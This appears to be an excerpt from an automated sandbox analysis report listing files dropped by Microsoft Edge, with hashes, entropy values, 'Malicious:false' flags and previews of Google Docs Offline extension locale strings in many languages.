                                                                                                                                                                                                                                                                                                                          Size (bytes):806
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                                          MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                                          SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                                          SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                                          SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):883
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                                          MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                                          SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                                          SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                                          SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1031
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                                          MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                                          SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                                          SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                                          SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1613
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                                          MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                                          SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                                          SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                                          SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):848
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                                          MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                                          SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                                          SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                                          SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1425
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                                          MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                                          SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                                          SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                                          SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):961
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                                          MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                                          SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                                          SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                                          SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):959
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                                          MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                                          SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                                          SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                                          SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):968
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):838
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1305
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):911
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):939
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):977
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):972
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):990
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1658
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1672
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):935
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
